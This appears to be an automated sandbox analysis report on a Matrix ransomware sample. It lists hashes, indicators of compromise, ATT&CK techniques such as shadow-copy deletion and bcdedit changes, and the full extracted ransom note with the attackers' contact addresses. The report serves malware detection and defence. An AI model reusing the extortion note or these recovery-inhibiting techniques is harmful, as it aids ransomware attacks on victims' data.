matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Analysis

max time kernel
149s
max time network
113s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
03-04-2024 17:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Size

1.2MB
MD5

c82d64850d35cc6a536c11adbd261cf6
SHA1

9f4d070a1b4668d110b57c167c4527fa2752c1fe
SHA256

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
SHA512

777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
SSDEEP

24576:pLeb4QFvTn5TuJR5ezGPMy4EnBBuKfDW:Qb/GMef

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\#KOK8_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected] \par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 0CB67C4C64AB2605\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 0CB67C4C64AB2605\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 6hxl9V39\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\sw\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zh-TW\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ga-IE\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk-1.8\jre\lib\management\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-BR\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zh-CN\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280810\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MEIPreload\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fi\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\USOShared\Logs\System\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Microsoft\EdgeUpdate\Log\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\eu\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Package Cache\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}v64.0.5329\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\Documents\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Mozilla Firefox\browser\VisualElements\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Mozilla Firefox\uninstall\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\Videos\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ta\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ms\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\is\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\af\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\Contacts\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fil-PH\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\mn\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{157b4444-13fe-4d7c-8d2d-723c037d05e3}\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\mr\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca-Es-VALENCIA\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk-1.8\jre\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\lt\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mi-NZ\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\Saved Games\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Extensions\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
5236	bcdedit.exe
6524	bcdedit.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
146	1604	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	3xoBcHMg64.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	3xoBcHMg64.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 64 IoCs

pid	Process
696	NWL2GIAk.exe
7016	3xoBcHMg.exe
4332	3xoBcHMg64.exe
5408	3xoBcHMg.exe
4696	3xoBcHMg.exe
60	3xoBcHMg.exe
5472	3xoBcHMg.exe
6388	3xoBcHMg.exe
6696	3xoBcHMg.exe
5996	3xoBcHMg.exe
6168	3xoBcHMg.exe
5412	3xoBcHMg.exe
6028	3xoBcHMg.exe
5696	3xoBcHMg.exe
5592	3xoBcHMg.exe
4204	3xoBcHMg.exe
1020	3xoBcHMg.exe
4760	3xoBcHMg.exe
6272	3xoBcHMg.exe
4276	3xoBcHMg.exe
5652	3xoBcHMg.exe
3036	3xoBcHMg.exe
6636	3xoBcHMg.exe
5448	3xoBcHMg.exe
2012	3xoBcHMg.exe
6240	3xoBcHMg.exe
6616	3xoBcHMg.exe
6340	3xoBcHMg.exe
4052	3xoBcHMg.exe
6644	3xoBcHMg.exe
6516	3xoBcHMg.exe
6480	3xoBcHMg.exe
7112	3xoBcHMg.exe
5816	3xoBcHMg.exe
5708	3xoBcHMg.exe
5144	3xoBcHMg.exe
5224	3xoBcHMg.exe
6696	3xoBcHMg.exe
5348	3xoBcHMg.exe
6484	3xoBcHMg.exe
6308	3xoBcHMg.exe
7164	3xoBcHMg.exe
3660	3xoBcHMg.exe
5696	3xoBcHMg.exe
5612	3xoBcHMg.exe
6188	3xoBcHMg.exe
5516	3xoBcHMg.exe
4760	3xoBcHMg.exe
6272	3xoBcHMg.exe
3728	3xoBcHMg.exe
6708	3xoBcHMg.exe
6440	3xoBcHMg.exe
6452	3xoBcHMg.exe
4244	3xoBcHMg.exe
5448	3xoBcHMg.exe
6312	3xoBcHMg.exe
6240	3xoBcHMg.exe
5272	3xoBcHMg.exe
6812	3xoBcHMg.exe
6364	3xoBcHMg.exe
6516	3xoBcHMg.exe
6480	3xoBcHMg.exe
1988	3xoBcHMg.exe
5944	3xoBcHMg.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
